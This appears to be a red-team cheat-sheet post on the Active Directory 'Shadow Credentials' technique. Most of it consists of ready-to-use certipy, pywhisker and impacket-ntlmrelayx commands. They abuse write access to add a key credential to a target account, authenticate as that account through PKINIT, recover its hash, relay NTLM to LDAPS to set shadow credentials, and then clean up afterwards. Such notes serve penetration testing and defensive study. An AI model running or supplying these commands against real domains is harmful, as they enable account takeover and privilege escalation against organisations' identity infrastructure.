Shadow Credentials

05.06.2024 ยท dadevel

It is possible to add Key Credentials to the msDS-KeyCredentialLink attribute of the target user or computer object and then perform Kerberos authentication as that account using PKINIT. source

Shadow Credentials require Windows Server 2016 domain functional level or higher.

Abuse GenericWrite on a user object (jdoeadm) to add a key credential and retrieve the certificate. Now you can authenticate as the user via PKINIT. If you got computer instead, you can impersonate a domain admin on that computer trough Delegate2Thyself / S4U2self.

Add a new key credential, authenticate via PKINIT, Unpac the Hash and remove the key credential in one go.

certipy shadow auto -u [email protected] -p 'passw0rd' -account jdoeadm
pywhisker -v -d corp.local -u jdoe -k --no-pass -t jdoeadm --action add -P ''

Clean up.

The device UUID is printed by the command above.

pywhisker -d corp.local -u jdoe -k --no-pass -t jdoeadm --action remove --device-id $uuid
certipy shadow remove -u [email protected] -p 'passw0rd' -account jdoeadm -device-id $uuid

NTLM relay to LDAP and open an interactive LDAP shell (source). When relaying a computer account the shadow target should be the SAM account name, e.g. ws01$.

Requires PR 1402.

impacket-ntlmrelayx --no-dump --no-da --no-acl --no-validate-privs --no-smb-server --no-wcf-server --no-raw-server --http-port 8080 --interactive --target ldaps://dc01.corp.local
$ nc -v 127.0.0.1 11000
# set_shadow_creds jdoeadm
# clear_shadow_creds jdoeadm
# exit

NTLM relay to LDAP. Requires manual cleanup.

impacket-ntlmrelayx --no-dump --no-da --no-acl --no-validate-privs --no-smb-server --no-wcf-server --no-raw-server --http-port 8080 --shadow-credentials --shadow-target jdoeadm --target ldaps://dc01.corp.local

Untested tools:

References: